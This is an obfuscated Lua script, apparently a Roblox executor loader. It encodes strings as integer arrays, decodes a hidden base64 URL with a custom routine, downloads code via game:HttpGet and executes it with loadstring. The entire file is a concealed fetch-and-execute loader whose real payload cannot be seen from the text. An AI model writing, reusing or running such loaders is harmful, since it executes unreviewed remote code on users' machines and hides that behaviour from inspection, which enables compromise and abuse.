function vqClhqdJyIKQujiJltHKkVjZXHnMQUHFlxQJuHQDUwAnORHJcWmtwuDRCEsGKeTGSjhryiYxIjXYntgZTkLOweDhaVrolQKeqjey(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


function ufYFakQZFYlEfuBHw(code)res=vqClhqdJyIKQujiJltHKkVjZXHnMQUHFlxQJuHQDUwAnORHJcWmtwuDRCEsGKeTGSjhryiYxIjXYntgZTkLOweDhaVrolQKeqjey({})for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


local b=ufYFakQZFYlEfuBHw({6825,6930,7035,7140,7245,7350,7455,7560,7665,7770,7875,7980,8085,8190,8295,8400,8505,8610,8715,8820,8925,9030,9135,9240,9345,9450,10185,10290,10395,10500,10605,10710,10815,10920,11025,11130,11235,11340,11445,11550,11655,11760,11865,11970,12075,12180,12285,12390,12495,12600,12705,12810,5040,5145,5250,5355,5460,5565,5670,5775,5880,5985,4515,4935})
function iqDrrPhBJqYHdwCCdRBgGFTAcWqndSJkGIDpGdiVnGaSvNtHLNzOhDqOnGoLZwZIVOoaujrpMtEt(data) m=string.sub(data, 0, 99) data=data:gsub(m,ufYFakQZFYlEfuBHw({}))

data = string.gsub(data, ufYFakQZFYlEfuBHw({9555,9870})..b..ufYFakQZFYlEfuBHw({6405,9765}), ufYFakQZFYlEfuBHw({})) return (data:gsub(ufYFakQZFYlEfuBHw({4830}), function(x) if (x == ufYFakQZFYlEfuBHw({6405})) then return ufYFakQZFYlEfuBHw({}) end local r,f=ufYFakQZFYlEfuBHw({}),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and ufYFakQZFYlEfuBHw({5145}) or ufYFakQZFYlEfuBHw({5040})) end return r; end):gsub(ufYFakQZFYlEfuBHw({3885,10500,3885,10500,3885,10500,6615,3885,10500,6615,3885,10500,6615,3885,10500,6615,3885,10500,6615,3885,10500,6615}), function(x) if (#x ~= 8) then return ufYFakQZFYlEfuBHw({}) end local c=0 for i=1,8 do c=c+(x:sub(i,i)==ufYFakQZFYlEfuBHw({5145}) and 2^(8-i) or 0) end return string.char(c) end)) end


 


loadstring(game:HttpGet(iqDrrPhBJqYHdwCCdRBgGFTAcWqndSJkGIDpGdiVnGaSvNtHLNzOhDqOnGoLZwZIVOoaujrpMtEt(ufYFakQZFYlEfuBHw({11445,8925,8715,9345,8190,7350,8295,10290,10920,9450,8085,8295,6825,12495,10290,6930,7455,10185,7770,6930,7035,7665,10710,8190,10605,11760,8925,9450,7770,7140,10290,7980,9030,10395,8295,9135,6825,8295,7560,9240,10185,10920,8925,11550,12705,10500,12285,7245,7350,7980,7350,8400,10395,9240,12705,10395,7665,8925,7980,11865,7455,10500,7245,11550,12390,7665,11760,11025,10500,12600,12075,9450,9240,11655,12285,7980,12705,8190,9135,12390,12075,10920,12810,7770,11235,12810,8085,11130,11970,10500,10815,8190,8295,11340,12285,10290,11025,8715,12705,10185,7560,8610,5040,10395,7560,8085,5670,7980,12705,5985,11655,10500,9135,10500,11340,9450,5250,7350,12180,9450,9240,8085,12285,10395,5355,6930,10920,9345,5250,8925,12390,8295,9135,7350,11025,9450,8820,7245,12705,8190,11130,8190,11130,8190,8820,8610,11445,8085,11130,6825,12810,8085,8820,8085,5355,8295,7140,8610,11445,9450,11445,8085,5460,7980,11445,12600,5145,9345,8505,6405,6405}))))()
